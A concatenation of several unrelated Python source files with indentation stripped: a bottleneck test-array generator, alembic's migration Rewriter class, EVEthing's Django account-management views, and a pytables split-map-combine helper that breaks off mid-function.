def get_functions(
module_name: str, as_string: bool = False
) -> List[Union[str, Callable[[np.array], Union[int, float, np.array]]]]:
"""Returns a list of functions, optionally as string function names"""
if module_name == "all":
funcs = []
funcs_in_dict = func_dict()
for key in funcs_in_dict:
for func in funcs_in_dict[key]:
funcs.append(func)
else:
funcs = func_dict()[module_name]
if as_string:
funcs = [f.__name__ for f in funcs]
return funcs
def func_dict():
d = {}
d["reduce"] = [
bn.nansum,
bn.nanmean,
bn.nanstd,
bn.nanvar,
bn.nanmin,
bn.nanmax,
bn.median,
bn.nanmedian,
bn.ss,
bn.nanargmin,
bn.nanargmax,
bn.anynan,
bn.allnan,
]
d["move"] = [
bn.move_sum,
bn.move_mean,
bn.move_std,
bn.move_var,
bn.move_min,
bn.move_max,
bn.move_argmin,
bn.move_argmax,
bn.move_median,
bn.move_rank,
]
d["nonreduce"] = [bn.replace]
d["nonreduce_axis"] = [
bn.partition,
bn.argpartition,
bn.rankdata,
bn.nanrankdata,
bn.push,
]
return d
# ---------------------------------------------------------------------------
def arrays(func_name, dtypes=DTYPES):
return array_iter(array_generator, func_name, dtypes)
def array_iter(arrays_func, *args):
for a in arrays_func(*args):
if a.ndim < 2:
yield a
# this is good for an extra check but in everyday development it
# is a pain because it doubles the unit test run time
# elif a.ndim == 3:
# for axes in permutations(range(a.ndim)):
# yield np.transpose(a, axes)
else:
yield a
yield a.T
def array_generator(func_name, dtypes):
"""Iterator that yields arrays to use for unit testing."""
f_dtypes = list(set(dtypes) & set(FLOAT_DTYPES))
# define nan and inf
if func_name in ("partition", "argpartition"):
nan = 0
else:
nan = np.nan
if func_name in ("move_sum", "move_mean", "move_std", "move_var"):
# these functions can't handle inf
inf = 8
else:
inf = np.inf
# nan and inf
for dtype in f_dtypes:
yield np.array([inf, nan], dtype=dtype)
yield np.array([inf, -inf], dtype=dtype)
yield np.array([nan, 2, 3], dtype=dtype)
yield np.array([-inf, 2, 3], dtype=dtype)
if func_name != "nanargmin":
yield np.array([nan, inf], dtype=dtype)
# byte swapped
yield np.array([1, 2, 3], dtype=">f4")
yield np.array([1, 2, 3], dtype="<f4")
# make sure slow is callable
yield np.array([1, 2, 3], dtype=np.float16)
# regression tests
for dtype in dtypes:
yield np.array([1, 2, 3], dtype=dtype) + 1e9 # check that move_std is robust
yield np.array([0, 0, 0], dtype=dtype) # nanargmax/nanargmin
for dtype in f_dtypes:
yield np.array([1, nan, nan, 2], dtype=dtype) # nanmedian
yield np.array([2 ** 31], dtype=np.int64) # overflows on windows
for dtype in dtypes:
yield np.array([[1, 2], [3, 4]], dtype=dtype)[..., np.newaxis] # issue #183
# ties
for dtype in dtypes:
yield np.array([0, 0, 0], dtype=dtype)
yield np.array([1, 1, 1], dtype=dtype)
# 0d input
if not func_name.startswith("move"):
for dtype in dtypes:
yield np.array(-9, dtype=dtype)
yield np.array(0, dtype=dtype)
yield np.array(9, dtype=dtype)
if dtype in f_dtypes:
yield np.array(-inf, dtype=dtype)
yield np.array(inf, dtype=dtype)
yield np.array(nan, dtype=dtype)
# automate a bunch of arrays to test
ss = {}
ss[0] = {"size": 0, "shapes": [(0,), (0, 0), (2, 0), (2, 0, 1)]}
ss[1] = {"size": 8, "shapes": [(8,)]}
ss[2] = {"size": 12, "shapes": [(2, 6), (3, 4)]}
ss[3] = {"size": 16, "shapes": [(2, 2, 4)]}
ss[4] = {"size": 24, "shapes": [(1, 2, 3, 4)]}
for seed in (1, 2):
rs = np.random.RandomState(seed)
for ndim in ss:
size = ss[ndim]["size"]
shapes = ss[ndim]["shapes"]
for dtype in dtypes:
a = np.arange(size, dtype=dtype)
if issubclass(a.dtype.type, np.inexact):
if func_name not in ("nanargmin", "nanargmax"):
# numpy can't handle eg np.nanargmin([np.nan, np.inf])
idx = rs.rand(*a.shape) < 0.2
a[idx] = inf
idx = rs.rand(*a.shape) < 0.2
a[idx] = nan
idx = rs.rand(*a.shape) < 0.2
a[idx] *= -1
rs.shuffle(a)
for shape in shapes:
yield a.reshape(shape)
# non-contiguous arrays
for dtype in dtypes:
yield np.array([[1, 2], [3, 4]], dtype=dtype)[:, [1]] # gh 161
for dtype in dtypes:
# 1d
a = np.arange(12).astype(dtype)
for start in range(3):
for step in range(1, 3):
yield a[start::step] # don't use astype here; copy created
for dtype in dtypes:
# 2d
a = np.arange(12).reshape(4, 3).astype(dtype)
yield a[::2]
yield a[:, ::2]
yield a[::2][:, ::2]
for dtype in dtypes:
# 3d
a = np.arange(24).reshape(2, 3, 4).astype(dtype)
for start in range(2):
for step in range(1, 2):
yield a[start::step]
yield a[:, start::step]
yield a[:, :, start::step]
yield a[start::step][::2]
yield a[start::step][::2][:, ::2]
def array_order(a):
f = a.flags
string = []
if f.c_contiguous:
string.append("C")
if f.f_contiguous:
string.append("F")
if len(string) == 0:
string.append("N")
return ",".join(string)
| |
from typing import Any
from typing import Callable
from typing import Iterator
from typing import List
from typing import Type
from typing import TYPE_CHECKING
from typing import Union
from alembic import util
from alembic.operations import ops
if TYPE_CHECKING:
from alembic.operations.ops import AddColumnOp
from alembic.operations.ops import AlterColumnOp
from alembic.operations.ops import CreateTableOp
from alembic.operations.ops import MigrateOperation
from alembic.operations.ops import MigrationScript
from alembic.operations.ops import ModifyTableOps
from alembic.operations.ops import OpContainer
from alembic.runtime.migration import MigrationContext
from alembic.script.revision import Revision
class Rewriter:
"""A helper object that allows easy 'rewriting' of ops streams.
The :class:`.Rewriter` object is intended to be passed along
to the
:paramref:`.EnvironmentContext.configure.process_revision_directives`
parameter in an ``env.py`` script. Once constructed, any number
of "rewrites" functions can be associated with it, which will be given
the opportunity to modify the structure without having to have explicit
knowledge of the overall structure.
The function is passed the :class:`.MigrationContext` object and
``revision`` tuple that are passed to the :paramref:`.Environment
Context.configure.process_revision_directives` function normally,
and the third argument is an individual directive of the type
noted in the decorator. The function has the choice of returning
a single op directive, which normally can be the directive that
was actually passed, or a new directive to replace it, or a list
of zero or more directives to replace it.
.. seealso::
:ref:`autogen_rewriter` - usage example
"""
_traverse = util.Dispatcher()
_chained = None
def __init__(self) -> None:
self.dispatch = util.Dispatcher()
def chain(self, other: "Rewriter") -> "Rewriter":
"""Produce a "chain" of this :class:`.Rewriter` to another.
This allows two rewriters to operate serially on a stream,
e.g.::
writer1 = autogenerate.Rewriter()
writer2 = autogenerate.Rewriter()
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
@writer2.rewrites(ops.AddColumnOp)
def add_column_idx(context, revision, op):
idx_op = ops.CreateIndexOp(
'ixc', op.table_name, [op.column.name])
return [
op,
idx_op
]
writer = writer1.chain(writer2)
:param other: a :class:`.Rewriter` instance
:return: a new :class:`.Rewriter` that will run the operations
of this writer, then the "other" writer, in succession.
"""
wr = self.__class__.__new__(self.__class__)
wr.__dict__.update(self.__dict__)
wr._chained = other
return wr
def rewrites(
self,
operator: Union[
Type["AddColumnOp"],
Type["MigrateOperation"],
Type["AlterColumnOp"],
Type["CreateTableOp"],
Type["ModifyTableOps"],
],
) -> Callable:
"""Register a function as rewriter for a given type.
The function should receive three arguments, which are
the :class:`.MigrationContext`, a ``revision`` tuple, and
an op directive of the type indicated. E.g.::
@writer1.rewrites(ops.AddColumnOp)
def add_column_nullable(context, revision, op):
op.column.nullable = True
return op
"""
return self.dispatch.dispatch_for(operator)
def _rewrite(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrateOperation",
) -> Iterator["MigrateOperation"]:
try:
_rewriter = self.dispatch.dispatch(directive)
except ValueError:
_rewriter = None
yield directive
else:
if self in directive._mutations:
yield directive
else:
for r_directive in util.to_list(
_rewriter(context, revision, directive), []
):
r_directive._mutations = r_directive._mutations.union(
[self]
)
yield r_directive
def __call__(
self,
context: "MigrationContext",
revision: "Revision",
directives: List["MigrationScript"],
) -> None:
self.process_revision_directives(context, revision, directives)
if self._chained:
self._chained(context, revision, directives)
@_traverse.dispatch_for(ops.MigrationScript)
def _traverse_script(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrationScript",
) -> None:
upgrade_ops_list = []
for upgrade_ops in directive.upgrade_ops_list:
ret = self._traverse_for(context, revision, upgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for UpgradeOps traverse"
)
upgrade_ops_list.append(ret[0])
directive.upgrade_ops = upgrade_ops_list
downgrade_ops_list = []
for downgrade_ops in directive.downgrade_ops_list:
ret = self._traverse_for(context, revision, downgrade_ops)
if len(ret) != 1:
raise ValueError(
"Can only return single object for DowngradeOps traverse"
)
downgrade_ops_list.append(ret[0])
directive.downgrade_ops = downgrade_ops_list
@_traverse.dispatch_for(ops.OpContainer)
def _traverse_op_container(
self,
context: "MigrationContext",
revision: "Revision",
directive: "OpContainer",
) -> None:
self._traverse_list(context, revision, directive.ops)
@_traverse.dispatch_for(ops.MigrateOperation)
def _traverse_any_directive(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrateOperation",
) -> None:
pass
def _traverse_for(
self,
context: "MigrationContext",
revision: "Revision",
directive: "MigrateOperation",
) -> Any:
directives = list(self._rewrite(context, revision, directive))
for directive in directives:
traverser = self._traverse.dispatch(directive)
traverser(self, context, revision, directive)
return directives
def _traverse_list(
self,
context: "MigrationContext",
revision: "Revision",
directives: Any,
) -> None:
dest = []
for directive in directives:
dest.extend(self._traverse_for(context, revision, directive))
directives[:] = dest
def process_revision_directives(
self,
context: "MigrationContext",
revision: "Revision",
directives: List["MigrationScript"],
) -> None:
self._traverse_list(context, revision, directives)
| |
# ------------------------------------------------------------------------------
# Copyright (c) 2010-2013, EVEthing team
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
# ------------------------------------------------------------------------------
import gzip
from cStringIO import StringIO
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import HttpResponseForbidden
from django.shortcuts import redirect, render
from django.views.decorators.debug import sensitive_post_parameters, sensitive_variables
from django.contrib.auth.forms import UserCreationForm
from core.util import get_minimum_keyid
from thing.forms import UploadSkillPlanForm
from thing.models import * # NOPEP8
from thing.stuff import * # NOPEP8
@login_required
def account(request):
"""Account management view"""
if 'message' in request.session:
message = request.session.pop('message')
message_type = request.session.pop('message_type')
else:
message = None
message_type = None
profile = request.user.profile
characters = Character.objects.filter(apikeys__user=request.user).distinct()
home_hide_characters = set(int(c) for c in profile.home_hide_characters.split(',') if c)
return render_page(
'thing/account.html',
{
'message': message,
'message_type': message_type,
'profile': profile,
'home_chars_per_row': (2, 3, 4, 6),
'home_sort_orders': UserProfile.HOME_SORT_ORDERS,
'characters': characters,
'home_hide_characters': home_hide_characters,
'themes': settings.THEMES,
'apikeys': APIKey.objects.filter(user=request.user).order_by('-valid', 'key_type', 'name'),
'skillplans': SkillPlan.objects.filter(user=request.user),
'visibilities': SkillPlan.VISIBILITY_CHOICES,
'disable_password': getattr(settings, 'DISABLE_ACCOUNT_PASSWORD', False)
},
request,
[c.id for c in characters],
)
@sensitive_post_parameters()
@sensitive_variables()
@login_required
def account_change_password(request):
"""Change password"""
old_password = request.POST['old_password']
new_password = request.POST['new_password']
confirm_password = request.POST['confirm_password']
# Password checks out ok
if request.user.check_password(old_password):
# New passwords match
if new_password == confirm_password:
# Length seems ok
if len(new_password) >= 4:
request.session['message_type'] = 'success'
request.session['message'] = 'Password changed successfully.'
request.user.set_password(new_password)
request.user.save()
# Too short
else:
request.session['message_type'] = 'error'
request.session['message'] = 'Password must be at least 4 characters long!'
# Passwords don't match
else:
request.session['message_type'] = 'error'
request.session['message'] = 'New passwords do not match!'
# Old password is incorrect
else:
request.session['message_type'] = 'error'
request.session['message'] = 'Old password is incorrect!'
return redirect('%s#password' % (reverse(account)))
@login_required
def account_settings(request):
profile = request.user.profile
theme = request.POST.get('theme', 'theme-default')
if [t for t in settings.THEMES if t[0] == theme]:
profile.theme = theme
profile.show_clock = (request.POST.get('show_clock', '') == 'on')
profile.show_assets = (request.POST.get('show_assets', '') == 'on')
profile.show_blueprints = (request.POST.get('show_blueprints', '') == 'on')
profile.show_contracts = (request.POST.get('show_contracts', '') == 'on')
profile.show_industry = (request.POST.get('show_industry', '') == 'on')
profile.show_orders = (request.POST.get('show_orders', '') == 'on')
profile.show_trade = (request.POST.get('show_trade', '') == 'on')
profile.show_transactions = (request.POST.get('show_transactions', '') == 'on')
profile.show_wallet_journal = (request.POST.get('show_wallet_journal', '') == 'on')
profile.show_pi = (request.POST.get('show_pi', '') == 'on')
profile.show_item_icons = (request.POST.get('show_item_icons', '') == 'on')
entries_per_page = request.POST.get('entries_per_page', '100')
if entries_per_page not in ('100', '200', '300', '400', '500'):
entries_per_page = '100'
profile.entries_per_page = entries_per_page
home_chars_per_row = int(request.POST.get('home_chars_per_row'), 0)
if home_chars_per_row in (2, 3, 4, 6):
profile.home_chars_per_row = home_chars_per_row
home_sort_order = request.POST.get('home_sort_order')
if [o for o in UserProfile.HOME_SORT_ORDERS if o[0] == home_sort_order]:
profile.home_sort_order = home_sort_order
profile.home_sort_descending = (request.POST.get('home_sort_descending', '') == 'on')
profile.home_show_locations = (request.POST.get('home_show_locations', '') == 'on')
profile.home_show_separators = (request.POST.get('home_show_separators', '') == 'on')
profile.home_highlight_backgrounds = (request.POST.get('home_highlight_backgrounds', '') == 'on')
profile.home_highlight_borders = (request.POST.get('home_highlight_borders', '') == 'on')
profile.home_show_security = (request.POST.get('home_show_security', '') == 'on')
# hide characters
profile.home_hide_characters = ','.join(c for c in request.POST.getlist('home_hide_characters') if c.isdigit())
profile.save()
request.session['message_type'] = 'success'
request.session['message'] = 'Settings changed successfully.'
return redirect(account)
@login_required
def account_apikey_add(request):
"""Add an API key"""
keyid = request.POST.get('keyid', '0')
vcode = request.POST.get('vcode', '').strip()
name = request.POST.get('name', '')
group_name = request.POST.get('group_name', '')
if not keyid.isdigit():
request.session['message_type'] = 'error'
request.session['message'] = 'KeyID is not an integer!'
elif int(keyid) < 1 or int(keyid) > 2 ** 31:
request.session['message_type'] = 'error'
request.session['message'] = 'Invalid KeyID!'
elif len(vcode) != 64:
request.session['message_type'] = 'error'
request.session['message'] = 'vCode must be 64 characters long!'
elif int(keyid) < get_minimum_keyid():
request.session['message_type'] = 'error'
request.session['message'] = 'This key was created more than 30 minutes ago, make a new one for each app!'
else:
if request.user.profile.can_add_keys is False:
request.session['message_type'] = 'error'
request.session['message'] = 'You are not allowed to add API keys!'
elif APIKey.objects.filter(user=request.user, keyid=request.POST.get('keyid', 0)).count():
request.session['message_type'] = 'error'
request.session['message'] = 'You already have an API key with that KeyID!'
else:
apikey = APIKey(
user_id=request.user.id,
keyid=keyid,
vcode=vcode,
name=name,
group_name=group_name,
)
apikey.save()
request.session['message_type'] = 'success'
request.session['message'] = 'API key added successfully!'
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_apikey_delete(request):
"""Delete an API key"""
apikey_id = request.POST.get('apikey_id', '')
if apikey_id.isdigit():
try:
apikey = APIKey.objects.get(user=request.user.id, id=apikey_id)
except APIKey.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not have an API key with that KeyID!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'API key %s deleted successfully!' % (apikey.id)
apikey.delete()
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_apikey_edit(request):
"""Edit an API key"""
try:
apikey = APIKey.objects.get(user=request.user.id, id=request.POST.get('apikey_id', '0'))
except APIKey.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not have an API key with that KeyID!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'API key %s edited successfully!' % apikey.id
apikey_name = request.POST.get('name', '')
apikey_group_name = request.POST.get('group_name', '')
dont_edit = request.POST.get('dont_edit', '')
if apikey.name != apikey_name and dont_edit != 'name':
apikey.name = apikey_name
apikey.save()
elif apikey.group_name != apikey_group_name and dont_edit != 'group_name':
apikey.group_name = apikey_group_name
apikey.save()
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_apikey_purge(request):
"""Purge an API key's data"""
apikey_id = request.POST.get('apikey_id', '')
if apikey_id.isdigit():
try:
apikey = APIKey.objects.get(user=request.user.id, id=apikey_id)
except APIKey.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not have an API key with that KeyID!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'API key %s purge queued successfully!' % (apikey.id)
apikey.purge_data()
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#apikeys' % (reverse(account)))
@login_required
def account_skillplan_add(request):
"""Add a skillplan"""
if request.method == 'POST':
form = UploadSkillPlanForm(request.POST, request.FILES)
if form.is_valid():
_handle_skillplan_upload(request)
return redirect('%s#skillplans' % (reverse(account)))
else:
request.session['message_type'] = 'error'
request.session['message'] = 'Form validation failed!'
else:
request.session['message_type'] = 'error'
request.session['message'] = "That doesn't look like a POST request!"
return redirect('%s#skillplans' % (reverse(account)))
@login_required
def account_skillplan_delete(request):
"""Delete a skillplan"""
skillplan_id = request.POST.get('skillplan_id', '')
if skillplan_id.isdigit():
try:
skillplan = SkillPlan.objects.get(user=request.user, id=skillplan_id)
except SkillPlan.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not own that skill plan!'
else:
request.session['message_type'] = 'success'
request.session['message'] = 'Skill plan "%s" deleted successfully!' % (skillplan.name)
# Delete all of the random things for this skillplan
entries = SPEntry.objects.filter(skill_plan=skillplan)
SPRemap.objects.filter(pk__in=[e.sp_remap_id for e in entries if e.sp_remap_id]).delete()
SPSkill.objects.filter(pk__in=[e.sp_skill_id for e in entries if e.sp_skill_id]).delete()
entries.delete()
skillplan.delete()
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#skillplans' % (reverse(account)))
@login_required
def account_skillplan_edit(request):
"""Edit a skillplan"""
skillplan_id = request.POST.get('skillplan_id', '')
if skillplan_id.isdigit():
try:
skillplan = SkillPlan.objects.get(user=request.user, id=skillplan_id)
except SkillPlan.DoesNotExist:
request.session['message_type'] = 'error'
request.session['message'] = 'You do not own that skill plan!'
else:
skillplan.name = request.POST['name']
skillplan.visibility = request.POST['visibility']
skillplan.save()
request.session['message_type'] = 'success'
request.session['message'] = 'Skill plan "%s" edited successfully!' % (skillplan.name)
else:
request.session['message_type'] = 'error'
request.session['message'] = 'You seem to be doing silly things, stop that.'
return redirect('%s#skillplans' % (reverse(account)))
def _handle_skillplan_upload(request):
name = request.POST['name'].strip()
uf = request.FILES['file']
visibility = request.POST['visibility']
# Check that this name is unique for the user
if SkillPlan.objects.filter(user=request.user, name=name).count() > 0:
request.session['message_type'] = 'error'
request.session['message'] = "You already have a skill plan with that name!"
return
# Check file size, 10KB should be more than large enough
if uf.size > 10240:
request.session['message_type'] = 'error'
request.session['message'] = "That file is too large!"
return
data = StringIO(uf.read())
# Try opening it as a gzip file
gf = gzip.GzipFile(fileobj=data)
try:
data = gf.read()
except IOError:
request.session['message_type'] = 'error'
request.session['message'] = "That doesn't look like a .EMP file!"
return
# Make sure it's valid XML
try:
root = ET.fromstring(data)
except ET.ParseError:
request.session['message_type'] = 'error'
request.session['message'] = "That doesn't look like a .EMP file!"
return
# FINALLY
skillplan = SkillPlan.objects.create(
user=request.user,
name=name,
visibility=visibility,
)
_parse_emp_plan(skillplan, root)
request.session['message_type'] = 'success'
request.session['message'] = "Skill plan uploaded successfully."
def _parse_emp_plan(skillplan, root):
entries = []
position = 0
seen = {}
for entry in root.findall('entry'):
# Create the various objects for the remapping if it exists
remapping = entry.find('remapping')
if remapping is not None:
# <remapping status="UpToDate" per="17" int="27" mem="21" wil="17" cha="17" description="" />
spr = SPRemap.objects.create(
int_stat=remapping.attrib['int'],
mem_stat=remapping.attrib['mem'],
per_stat=remapping.attrib['per'],
wil_stat=remapping.attrib['wil'],
cha_stat=remapping.attrib['cha'],
)
entries.append(SPEntry(
skill_plan=skillplan,
position=position,
sp_remap=spr,
))
position += 1
# Grab some data we'll need
skillID = int(entry.attrib['skillID'])
level = int(entry.attrib['level'])
priority = int(entry.attrib['priority'])
# Get prereqs for this skill
prereqs = Skill.get_prereqs(skillID)
# Add any missing prereq skills
for pre_skill_id, pre_level in prereqs:
for i in range(seen.get(pre_skill_id, 0) + 1, pre_level + 1):
try:
sps = SPSkill.objects.create(
skill_id=pre_skill_id,
level=i,
priority=priority,
)
except:
continue
entries.append(SPEntry(
skill_plan=skillplan,
position=position,
sp_skill=sps,
))
position += 1
seen[pre_skill_id] = i
# Add the actual skill
for i in range(seen.get(skillID, 0) + 1, level + 1):
try:
sps = SPSkill.objects.create(
skill_id=skillID,
level=i,
priority=priority,
)
except:
continue
entries.append(SPEntry(
skill_plan=skillplan,
position=position,
sp_skill=sps,
))
position += 1
seen[skillID] = i
SPEntry.objects.bulk_create(entries)
def account_register(request):
"""Register Account"""
if not settings.ALLOW_REGISTRATION:
return HttpResponseForbidden()
if request.user.is_authenticated():
return redirect(reverse('home'))
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect(reverse('home'))
else:
form = UserCreationForm()
return render(request, "registration/register.html", {
'form': form,
})
| |
''' Implements the often needed split, map, combine paradigm '''
from __future__ import division
import os
import shutil
import tempfile
from collections import Iterable
from multiprocessing import Pool, cpu_count
import dill
import numpy as np
import tables as tb
def apply_async(pool, fun, args=None, **kwargs):
''' Run fun(*args, **kwargs) in different process.
fun can be a complex function since pickling is not done with the
cpickle module as multiprocessing.apply_async would do, but with
the more powerfull dill serialization.
Additionally kwargs can be given and args can be given'''
payload = dill.dumps((fun, args, kwargs))
return pool.apply_async(_run_with_dill, (payload,))
def _run_with_dill(payload):
''' Unpickle payload with dill.
The payload is the function plus arguments and keyword arguments.
'''
fun, args, kwargs = dill.loads(payload)
if args:
return fun(*args, **kwargs)
else:
return fun(**kwargs)
class SMC(object):
def __init__(self, table_file_in, file_out,
func, func_kwargs={}, node_desc={}, table=None,
align_at=None, n_cores=None, chunk_size=1000000):
''' Apply a function to a pytable on multiple cores in chunks.
Parameters
----------
table_file_in : string
File name of the file with the table.
file_out : string
File name with the resulting table/histogram.
func : function
Function to be applied on table chunks.
func_kwargs : dict
Additional kwargs to pass to worker function
node_desc : dict
Output table/array parameters for pytables. Can be empty.
Name/Filters/Title values are deduced from the input table
if not defined. Data type is deduced from resulting data
format if not defined.
Example:
node_desc = {'name': test}
Would create an output node with the name test, the title and
filters as the input table and the data type is deduced from
the calculated data.
table : string, iterable of strings, None
string: Table name. Needed if multiple tables exists in file.
iterable of strings: possible table names. First existing table
is used
None: only table is used independent of name. If multiple
tables exist exception is raised
align_at : string, None
If specified align chunks at this column values
n_cores : integer, None
How many cores to use. If None use all available cores.
If 1 multithreading is disabled, useful for debuging.
chunk_size : int
Chunk size of the data when reading from file.
Notes:
------
It follows the split, apply, combine paradigm:
- split: data is splitted into chunks for multiple processes for
speed increase
- map: the function is called on each chunk. If the chunk per core
is still too large to fit in memory it is chunked further. The
result is written to a table per core.
- combine: the tables are merged into one result table or one
result histogram depending on the output data format
'''
# Set parameters
self.table_file_in = table_file_in
self.file_out = file_out
self.n_cores = n_cores
self.align_at = align_at
self.func = func
self.node_desc = node_desc
self.chunk_size = chunk_size
self.func_kwargs = func_kwargs
if self.align_at and self.align_at != 'event_number':
raise NotImplementedError('Data alignment is only supported '
'on event_number')
# Get the table node name
with tb.open_file(table_file_in) as in_file:
if not table: # Find the table node
tables = in_file.list_nodes('/', classname='Table') # get all nodes of type 'table'
if len(tables) == 1: # if there is only one table, take this one
self.node_name = tables[0].name
else: # Multiple tables
raise RuntimeError('No table node defined and multiple table nodes found in file')
elif isinstance(table, (list, tuple, set)): # possible names
self.node_name = None
for node_cand in table:
try:
in_file.get_node(in_file.root, node_cand)
self.node_name = node_cand
except tb.NoSuchNodeError:
pass
if not self.node_name:
raise RuntimeError('No table nodes with names %s found', str(table))
else: # string
self.node_name = table
node = in_file.get_node(in_file.root, self.node_name)
# Set number of rows
self.n_rows = node.shape[0]
# Set output parameters from input if not defined
self.node_desc.setdefault('filters', node.filters)
self.node_desc.setdefault('name', node.name)
self.node_desc.setdefault('title', node.title)
if not self.n_cores: # Set n_cores to maximum cores available
self.n_cores = cpu_count()
# Deactivate multithreading for small data sets
# Overhead of pools can make multiprocesssing slower
if self.n_rows < 2. * self.chunk_size:
self.n_cores = 1
# The three main steps
self._split()
self._map()
self._combine()
def _split(self):
self.start_i, self.stop_i = self._get_split_indeces()
assert len(self.start_i) == len(self.stop_i)
def _map(self):
chunk_size_per_core = int(self.chunk_size / self.n_cores)
if self.n_cores == 1:
self.tmp_files = [self._work(self.table_file_in,
self.node_name,
self.func,
self.func_kwargs,
self.node_desc,
self.start_i[0],
self.stop_i[0],
chunk_size_per_core)]
else:
# Run function in parallel
pool = Pool(self.n_cores)
jobs = []
for i in range(self.n_cores):
job = apply_async(pool=pool,
fun=self._work,
table_file_in=self.table_file_in,
node_name=self.node_name,
func=self.func,
func_kwargs=self.func_kwargs,
node_desc=self.node_desc,
start_i=self.start_i[i],
stop_i=self.stop_i[i],
chunk_size=chunk_size_per_core
)
jobs.append(job)
# Gather results
self.tmp_files = []
for job in jobs:
self.tmp_files.append(job.get())
pool.close()
pool.join()
del pool
def _work(self, table_file_in, node_name, func, func_kwargs,
node_desc, start_i, stop_i, chunk_size):
''' Defines the work per worker.
Reads data, applies the function and stores data in chunks into a table
or a histogram.
'''
with tb.open_file(table_file_in, 'r') as in_file:
node = in_file.get_node(in_file.root, node_name)
output_file = tempfile.NamedTemporaryFile(delete=False, dir=os.getcwd())
with tb.open_file(output_file.name, 'w') as out_file:
# Create result table with specified data format
# From given pytables tables description
if 'description' in node_desc:
table_out = out_file.create_table(out_file.root,
**node_desc)
# Data format unknown and has to be determined later
# and thus the table has to be created later
else:
table_out = None
# Create result histogram
hist_out = None
for data, _ in self._chunks_at_event(table=node,
start_index=start_i,
stop_index=stop_i,
chunk_size=chunk_size):
data_ret = func(data, **func_kwargs)
# Create table if not existing
# Extract table description from returned data
if not table_out:
if data_ret.dtype.names: # Recarray thus table needed
dcr = data_ret.dtype
table_out = out_file.create_table(out_file.root,
description=dcr,
**node_desc)
# Create histogram if data is not a table
elif hist_out is None:
# Copy needed for reshape
hist_out = data_ret.copy()
continue
if table_out is not None:
table_out.append(data_ret) # Tables are appended
else:
# Check if array needs to be enlarged
shape = []
# Loop over dimension
for i in range(len(hist_out.shape)):
if hist_out.shape[i] < data_ret.shape[i]:
shape.append(data_ret.shape[i])
else:
shape.append(hist_out.shape[i])
hist_out.resize(shape)
# Add array, ignore size
data_ret.resize(hist_out.shape)
hist_out += data_ret
if hist_out is not None:
# Store histogram to file
dt = hist_out.dtype
out = out_file.create_carray(out_file.root,
atom=tb.Atom.from_dtype(dt),
shape=hist_out.shape,
**node_desc)
out[:] = hist_out
return output_file.name
def _combine(self):
# Try to set output node name if defined
try:
node_name = self.node_desc['name']
except KeyError:
# Output node name set to input node name
node_name = self.node_name
# Check data type to decide on combine procedure
data_type = 'table'
with tb.open_file(self.tmp_files[0], 'r') as in_file:
node = in_file.get_node(in_file.root, node_name)
if type(node) is tb.carray.CArray:
data_type = 'array'
if data_type == 'table':
# Use first tmp file as result file
shutil.move(self.tmp_files[0], self.file_out)
with tb.open_file(self.file_out, 'r+') as out_file:
node = out_file.get_node(out_file.root, node_name)
for f in self.tmp_files[1:]:
with tb.open_file(f) as in_file:
tmp_node = in_file.get_node(in_file.root, node_name)
for i in range(0, tmp_node.shape[0], self.chunk_size):
node.append(tmp_node[i: i + self.chunk_size])
os.remove(f)
else: # TODO: solution without having all hists in RAM
# Only one file, merging not needed
if len(self.tmp_files) == 1:
shutil.move(self.tmp_files[0], self.file_out)
else: # Several files, merge them by adding up
with tb.open_file(self.file_out, 'w') as out_file:
hist_data = None
for f in self.tmp_files:
with tb.open_file(f) as in_file:
tmp_data = in_file.get_node(in_file.root, node_name)[:]
if hist_data is None:
# Copy needed for reshape
hist_data = tmp_data.copy()
else:
# Check if array needs to be enlarged
shape = []
# Loop over dimension
for i in range(len(hist_data.shape)):
if hist_data.shape[i] < tmp_data.shape[i]:
